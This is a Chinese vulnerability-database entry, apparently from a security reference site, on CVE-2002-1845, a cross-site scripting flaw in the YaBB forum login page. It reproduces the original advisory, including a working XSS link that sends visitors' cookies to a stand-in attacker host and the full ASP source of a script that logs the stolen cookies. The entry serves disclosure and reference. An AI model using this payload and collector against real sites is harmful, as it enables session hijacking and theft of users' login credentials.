YaBB登录跨站脚本漏洞

YaBB登录跨站脚本漏洞

漏洞ID 1107051 漏洞类型 跨站脚本
发布时间 2002-10-18 更新时间 2005-10-20
图片[1]-YaBB登录跨站脚本漏洞-安全小百科CVE编号 CVE-2002-1845
图片[2]-YaBB登录跨站脚本漏洞-安全小百科CNNVD-ID CNNVD-200212-163
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/21950
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-163
|漏洞详情
YetAnotherBulletinBoard(YaBB)1.40和1.41版本的index.php存在跨站脚本(XSS)漏洞。远程攻击者借助password(passwrd)参数插入任意web脚本或者HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/6004/info

A cross-site scripting vulnerability has been reported in the YaBB (Yet Another Bulletin Board) forum login script. HTML tags or script code are not sanitized from the error output of erroneous login attempts.

As a result, it is possible for a remote attacker to create a malicious link to the login page of a site hosting the web forum. The malicious link may contain arbitrary HTML and script code in the password field. Visiting the link will cause attacker-supplied code to be executed in the web client of the user.

It has been demonstrated that this vulnerability may be exploited to steal cookie-based authentication credentials. Furthermore, once an attacker has hijacked a user's session with the credentials it is possible to change that user's password without needing to further authenticate.

http://example.com/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>window.location.href(%22http://www.attackersite.example.com/hack.asp?%22%2Bdocument.cookie)</script>

An ASP script was also provided which will receive stolen cookie-based authentication credentials. 

------------------------------- hack.asp ------------------------------------ <% Option Explicit Const ForWriting = 2 Const ForAppending = 8 Const Create = True Dim MyFile Dim FSO ' FileSystemObject Dim TSO ' TextStreamObject Dim Str Str = Request.ServerVariables("QUERY_STRING") MyFile = Server.MapPath("./db/log.txt") Set FSO = Server.CreateObject("Scripting.FileSystemObject") Set TSO = FSO.OpenTextFile(MyFile, ForAppending, Create) if (Str <> "") then TSO.WriteLine Str TSO.close Set TSO = Nothing Set FSO = Nothing %> You have just been hacked. ----------------------------------- EOF -----------------------------------
|参考资料

来源:BID
名称:6004
链接:http://www.securityfocus.com/bid/6004
来源:XF
名称:yabb-index-xss(10406)
链接:http://www.iss.net/security_center/static/10406.php

相关推荐: XOOPS 2.0 XoopsOption – Information Disclosure

XOOPS 2.0 XoopsOption – Information Disclosure 漏洞ID 1107251 漏洞类型 发布时间 2003-03-20 更新时间 2003-03-20 CVE编号 CVE-2003-1550 CNNVD-ID N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享